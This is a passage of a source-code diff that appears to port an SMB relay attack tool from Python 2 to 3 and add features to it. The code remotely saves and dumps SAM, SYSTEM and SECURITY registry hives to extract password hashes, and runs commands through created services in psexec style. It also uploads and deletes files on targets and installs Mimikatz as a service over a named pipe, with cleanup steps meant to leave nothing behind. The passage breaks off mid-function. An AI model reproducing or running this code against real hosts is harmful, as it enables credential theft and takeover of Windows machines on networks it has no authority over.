alreadydone = int(round(80 * count / float(count_number))) + pourcent = round(100.0 * count / float(count_number), 1) + progress = '=' * alreadydone + '-' * (80 - alreadydone) + sys.stdout.write('[%s] %s%s\r' % (progress, pourcent, '%')) + sys.stdout.flush() + dataoffset = dataoffset + 65520 + data, s, out = ReadOutput(StructWithLenPython2or3("60: + minutes = Seconds/60 + print('Downloaded in: %.3g minutes.\n'%(minutes)) + if Seconds<60: + print('Downloaded in: %.3g seconds'%(Seconds)) + if isinstance(data, str): + data = data.encode('latin-1') + ##Close Request - if data[8:10] == "\x2e\x00": - head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00") - t = CloseRequest(FID = f) + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x04",flag1="\x18", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = CloseRequest(FID = f.decode('latin-1')) packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ##DeleteFileRequest. - if data[8:10] == "\x04\x00": - head = SMBHeader(cmd="\x06",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x13\x00") - t = DeleteFileRequest(File=Filename) - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - #print "[+] Deleting file now." - s.send(buffer1) - data = s.recv(2048) + if data[8:10] == b"\x04\x00": + head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00") + t = DeleteFileRequest(File=Filename) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) - if data[8:10] == "\x06\x00": - #print "[+] File deleted, making sure it's not there anymore.." - head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x11\x00") - t = OpenAndX(File=Filename, OpenFunc="\x01\x00") - t.calculate() - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) - data = s.recv(2048) - return data, s, Output + if data[8:10] == b"\x06\x00": + head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = OpenAndX(File=Filename, OpenFunc="\x01\x00") + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + return data, s, Output + +def DeleteAFile(Filename, data, s, Host): + ##Start with a Tree connect on C$ + head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x10\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBTreeConnectData(Path="\\\\"+Host+"\\C$") + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ##DeleteFileRequest. + if data[8:10] == b"\x75\x00": + head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00") + t = DeleteFileRequest(File=Filename) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + if data[8:10] == b"\x06\x21": + time.sleep(1) + head = SMBHeader(cmd="\x06",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x13\x00") + t = DeleteFileRequest(File=Filename) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + if data[8:10] == b"\x06\x21": + print("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.") + print("[+] Try taskkill /F /IM process_name, then delete the file.") + return data, s + + if data[8:10] == b"\x06\x34": + print("[+] Delete Failed. File not found.") + return data, s + + if data[8:10] == b"\x06\x00": + head = SMBHeader(cmd="\x2d",flag1="\x10", flag2="\x00\x10",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x11\x00") + t = OpenAndX(File=Filename, OpenFunc="\x01\x00") + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + return data, s def GrabKeyValue(s, f, handler, data, keypath): ## DCE/RPC OpenKey. - if data[8:10] == "\x25\x00": + if data[8:10] == b"\x25\x00": ContextHandler = handler - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCEWinRegOpenKey(ContextHandle=ContextHandler,Key=keypath) w.calculate() x = SMBDCEPacketData(Opnum="\x0f\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC Query Info. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to read the key\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to read the key\n") return ModifySMBRetCode(data) - ContextHandler = data[84:104] - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + ContextHandler = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCEWinRegQueryInfoKey(ContextHandle=ContextHandler) x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) Value = data[104:120].decode('utf-16le') ## DCE/RPC CloseKey. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to close the key\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to close the key\n") return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler) x = SMBDCEPacketData(Opnum="\x05\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) return Value, data def SaveKeyToFile(Filename, Key, handler, f, data, s): ## DCE/RPC WinReg Create Key. - if data[8:10] == "\x25\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if data[8:10] == b"\x25\x00": + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCEWinRegCreateKey(ContextHandle=handler, KeyName = Key) w.calculate() x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC WinReg Save Key. - if data[8:10] == "\x25\x00": - ContextHandler = data[84:104] - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if data[8:10] == b"\x25\x00": + ContextHandler = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCEWinRegSaveKey(ContextHandle=ContextHandler, File=Filename) w.calculate() x = SMBDCEPacketData(Opnum="\x14\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) return data, s, f def OpenHKLM(data, s, f): ## DCE/RPC WinReg OpenHKLM. - if data[8:10] == "\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCEWinRegOpenHKLMKey() x = SMBDCEPacketData(Opnum="\x02\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - handler = data[84:104] + handler = data[84:104].decode('latin-1') return data, s, handler, f def OpenHKCU(data, s, f): ## DCE/RPC WinReg OpenHKCU. - if data[8:10] == "\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCEWinRegOpenHKCUKey() x = SMBDCEPacketData(Opnum="\x04\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - handler = data[84:104] + handler = data[84:104].decode('latin-1') return data, s, handler, f def ConvertValuesToBootKey(JDSkew1GBGData): + JDSkew1GBGData = JDSkew1GBGData.decode('latin-1') Key = "" Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7] for i in range(len(JDSkew1GBGData)): Key += JDSkew1GBGData[Xored[i]] - print 'BootKey: %s' % Key.encode("hex") + print('BootKey: %s' % codecs.encode(Key.encode('latin-1'), 'hex').decode('latin-1')) return Key ##########Dump Hashes############# def DumpHashes(data, s, Host): try: - stopped = False - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) + SaveAKey(data, s, Host, "SAM") + time.sleep(0.5) + SaveAKey(data, s, Host, "SYSTEM") + time.sleep(0.5) + SaveAKey(data, s, Host, "SECURITY") + time.sleep(0.5) + #Let's call secretsdump.py + print("[+] Calling SecretsDump\n") + Hashes = DumpSecrets(None, None, None, None) + Results = Hashes.dump(sam=SaveSam_Path+"./"+Host+"-SAM.tmp", security=SaveSam_Path+"./"+Host+"-SECURITY.tmp", system=SaveSam_Path+"./"+Host+"-SYSTEM.tmp", outfile=SaveSam_Path+"./"+Host) - if f == "PipeNotAvailable": - print "The Windows Remote Registry Service is sleeping, waking it up..." - time.sleep(3) - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - - if f == "PipeNotAvailable": - print "Retrying..." - time.sleep(5) - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - - if f == "ServiceNotFound": - stopped = True - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = StartWinregService(f, Host[0], data, s) - data,s = CloseFID(f, data,s) - #We should be all good here. - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - - data,s,handler,f = OpenHKLM(data,s,f) - - ##Error handling. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" - return ModifySMBRetCode(data) - ##Grab the keys - if data[8:10] == "\x25\x00": - JD, data = GrabKeyValue(s, f, handler, data, "SYSTEM\\CurrentControlSet\\Control\\Lsa\\JD") - Skew1, data = GrabKeyValue(s, f, handler, data, "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Skew1") - Data, data = GrabKeyValue(s, f, handler, data, "SYSTEM\\CurrentControlSet\\Control\\Lsa\\Data") - GBG, data = GrabKeyValue(s, f, handler, data, "SYSTEM\\CurrentControlSet\\Control\\Lsa\\GBG") - - #Dump bootkey, then finish up. - BootKey = ConvertValuesToBootKey(str(JD+Skew1+GBG+Data).decode("hex")) - RandomFile = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(6)])+'.tmp' - data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+RandomFile, "SAM", handler, f, data, s) - data,s = CloseFID(f, data, s) - data,s,f = SMBOpenFile("\\Windows\\Temp\\"+RandomFile, "C", Host[0], RW, data, s) - data,s,Output = ReadAndDelete(f, "\\Windows\\Temp\\"+RandomFile, data, s) - - #If the service was stopped before we came... - if stopped: - data,s = SMBOpenPipe(Host[0], data, s)#Get a new IPC$ TID. - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = StopWinregService(f, Host[0], data, s) - data,s = CloseFID(f, data,s) - data = ModifySMBRetCode(data) - - #After everything has been cleaned up, we write to file and call creddump - WriteOutputToFile(Output, "./Sam-"+Host[0]+".tmp") - try: - Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host[0]+".tmp") - WriteOutputToFile(Hashes, "./Hash-Dump-"+Host[0]+".txt") - except: - print "[+] Live dump failed, is python-crypto installed? " - pass - print "[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host[0]+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host[0]+".txt" - return data + print("[+] The hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt") + return data except: - #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. - print "[+] Something went wrong, try something else." - return ModifySMBRetCode(data) + #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. + return ModifySMBRetCode(data) ##########Save An HKLM Key And Its Subkeys############# def SaveAKey(data, s, Host, Key): try: - stopped = False - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) + stopped = False + data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - if f == "PipeNotAvailable": - print "The Windows Remote Registry Service is sleeping, waking it up..." - time.sleep(3) - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) + if f == "PipeNotAvailable": + print("The Windows Remote Registry Service is sleeping, waking it up...") + time.sleep(3) + data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - if f == "PipeNotAvailable": - print "Retrying..." - time.sleep(5) - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) + if f == "PipeNotAvailable": + print("Retrying...") + time.sleep(5) + data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - if f == "ServiceNotFound": - stopped = True - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = StartWinregService(f, Host[0], data, s) - data,s = CloseFID(f, data,s) - #We should be all good here. - data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) + if f == "ServiceNotFound": + stopped = True + data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) + print("Starting Windows Remote Registry...") + data,s,f = StartWinregService(f, Host, data, s) + data,s = CloseFID(f, data,s) + #We should be all good here. + data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s) - ##Error handling. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n" - return ModifySMBRetCode(data) + ##Error handling. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n") + return ModifySMBRetCode(data) - data,s,handler,f = OpenHKLM(data,s,f) + data,s,handler,f = OpenHKLM(data,s,f) - data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s) - if data[8:10] != "\x25\x00": - print "[+] Something went wrong, try something else." - return ModifySMBRetCode(data) - data,s = CloseFID(f, data, s) - data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host[0], RW, data, s) - data,s,Output = ReadAndDelete(f, "\\Windows\\Temp\\"+Key+".tmp", data, s) + data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s) + if data[8:10] != b"\x25\x00": + print("[+] Something went wrong, try something else.") + return ModifySMBRetCode(data) + data,s = CloseFID(f, data, s) + data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s) + data,s,Output = ReadAndDelete(f, "\\Windows\\Temp\\"+Key+".tmp", data, s) - #If the service was stopped before we came... - if stopped: - data,s = SMBOpenPipe(Host[0], data, s)#Get a new IPC$ TID. - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = StopWinregService(f, Host[0], data, s) - data,s = CloseFID(f, data,s) - data = ModifySMBRetCode(data) + #If the service was stopped before we came... + if stopped: + data,s = SMBOpenPipe(Host, data, s)#Get a new IPC$ TID. + data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) + data,s,f = StopWinregService(f, Host, data, s) + data,s = CloseFID(f, data,s) + data = ModifySMBRetCode(data) - #After everything has been cleaned up, we write the output to a file. - WriteOutputToFile(Output, Host[0]+"-"+Key+".tmp") - print "[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host[0]+"-"+Key+".tmp" - return data + #After everything has been cleaned up, we write the output to a file. + WriteOutputToFile(Output, Host+"-"+Key+".tmp") + print("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp") + return data except: - #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. - print "[+] Something went wrong, try something else." - return ModifySMBRetCode(data) + #Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works. + print("[+] Something went wrong, try something else.") + return ModifySMBRetCode(data) ##########ReadAFile############# def ReadFile(data, s, File, Host): try: - File = File.replace("/","\\") - data,s,f = SMBOpenFile(File, "C", Host[0], READ, data, s) - data,s,Output = GrabAndRead(f, File, data, s) - print Output - return ModifySMBRetCode(data) ##Command was successful, ret true. + File = File.replace("/","\\") + data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) + data,s,Output = GrabAndRead(f, File, data, s) + print(Output) + return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Read failed. Remote filename was typed correctly?" - return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. + print("[+] Read failed. Remote filename was typed correctly?") + return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. def GetAfFile(data, s, File, Host): try: - File = File.replace("/","\\") - data,s,f = SMBOpenFile(File, "C", Host[0], READ, data, s) - data,s,Output = GrabAndRead(f, File, data, s) - WriteOutputToFile(Output, Host[0]+"-"+File) - print "[+] Done." - return ModifySMBRetCode(data) ##Command was successful, ret true. + File = File.replace("/","\\") + data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) + data,s,Output = GrabAndRead(f, File, data, s) + WriteOutputToFile(Output, Host+"-"+File) + print("[+] Done.") + return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Get file failed. Remote filename was typed correctly?" - return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. + print("[+] Get file failed. Remote filename was typed correctly?") + return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. + +##########UploadAFile############# +def WriteFile(data, s, File, FileSize, FileContent, Host): + try: + File = File.replace("/","\\") + data,s,f = SMBOpenFileForWriting(File, FileSize, FileContent, "C", Host, RW, data, s) + data,s = UploadAndWrite(f, FileSize, FileContent, data, s) + return ModifySMBRetCode(data) ##Command was successful, ret true. + + except: + print("[+] Write failed.") + return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. + +##########DeleteAFile############ +def DeleteFile(data, s, File, Host): + try: + File = File.replace("/","\\") + data,s = DeleteAFile(File, data, s, Host) + data,s = CloseTID(data, s) + return ModifySMBRetCode(data) ##Command was successful, ret true. + except: + print("[+] Delete operation failed.\n[+] Something went wrong.") + data,s = CloseTID(data, s) + return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. ##########Psexec############# -def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host): +def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, FileName): try: - data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) - data,s,f = CreateService(Command, f, Host[0], data, s) - data,s = CloseFID(f, data,s) - data,s,f = SMBOpenFile("\\Windows\\Temp\\Results.txt", "C", Host[0], RW, data, s) - data,s,Output = ReadAndDelete(f, "\\Windows\\Temp\\Results.txt", data, s) - print Output - Logs.info('Command executed:') - Logs.info(clientIP+","+Username+','+Command) - return data + RandomFName = GenerateRandomFileName() + WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt" + LogFile = "\\Windows\\Temp\\"+RandomFName+".txt" + Command = RunPath+" \""+Command+"\" \""+WinTmpPath+"\"" + ServiceNameChars = GenerateServiceName() + ServiceIDChars = GenerateServiceID() + + data,s = SMBOpenPipe(Host, data, s) + data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) + data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s) + data,s = CloseFID(f, data,s) + time.sleep(1) + data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s) + data,s,Output = ReadAndDelete(f, LogFile, data, s) + print(Output) + data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) + + Logs.warning('Command executed:') + Logs.warning(clientIP+","+Username+','+Command) + + return data except: - #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." - return ModifySMBRetCode(data) + #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. + print("[+] Something went wrong, try something else.") + return ModifySMBRetCode(data) +##########Runas############# +def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): + try: + Command = Command.replace('"', '\'') + RandomFName = GenerateRandomFileName() + WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt" + LogFile = "\\Windows\\Temp\\"+RandomFName+".txt" + Command = "%windir%\\Temp\\"+FileName+" \""+Command+"\" \""+WinTmpPath+"\"" + ServiceNameChars = GenerateServiceName() + ServiceIDChars = GenerateServiceID() + + data,s = SMBOpenPipe(Host, data, s) + data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) + data,s,f = CreateService(Command, ServiceNameChars, ServiceIDChars, f, Host, data, s) + data,s = CloseFID(f, data,s) + time.sleep(1) + data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s) + data,s,Output = ReadAndDelete(f, LogFile, data, s) + print(Output) + data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) + + Logs.info('Command executed:') + Logs.info(clientIP+","+Username+','+Command) + return data + + except: + data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) + #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. + print("[+] Something went wrong, try something else.") + return ModifySMBRetCode(data) + +##########MimiKatz RPC############# +def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): + global MimiKatzSVCID + global MimiKatzSVCName + try: + if isinstance(data, str): + data = data.encode('latin-1') + DisplayGUID, DisplayGUIDle = Generateuuid() + NamedPipe = GenerateNamedPipeName() + RandomFName = GenerateRandomFileName() + WinTmpPath = "%windir%\\Temp\\"+RandomFName+".txt" + #Install mimikatz as a service. + Command = "c:\\Windows\\Temp\\"+FileName+" \"rpc::server /protseq:ncacn_np /endpoint:\pipe\\"+NamedPipe+" /guid:{"+DisplayGUID+"} /noreg\" service::me exit" + MimiKatzSVCName = GenerateServiceName() + MimiKatzSVCID = GenerateServiceID() + data,s = SMBOpenPipe(Host, data, s) + data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", "\\svcctl", data, s) + data,s,f = CreateMimikatzService(Command, MimiKatzSVCName, MimiKatzSVCID, f, Host, data, s) + data,s = CloseFID(f, data,s) + + Logs.info('Command executed:') + Logs.info(clientIP+","+Username+','+Command) + + return data, DisplayGUIDle, NamedPipe + + except: + #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. + print("[+] Something went wrong, try something else.") + return ModifySMBRetCode(data) + +def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): + try: + data,guid,namedpipe = InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName) + data,s = SMBOpenPipe(Host, data, s) + ##Wait for the pipe to come up.. + time.sleep(1) + + data,s,f = BindCall(guid, "\x01\x00", "\\"+namedpipe, data, s) + data,s,f = MimiKatzRPC(Command, f, Host, data, s) + data,s = SMBDCERPCCloseFID(f, data,s) + ##### + #Kill the SVC now... Never know when the user will leave, so lets not leave anything on the target. + data,s = SMBOpenPipe(Host, data, s) + data,s,f = BindCall("\x81\xbb\x7a\x36\x44\x98\xf1\x35\xad\x32\x98\xf0\x38\x00\x10\x03", "\x02\x00", 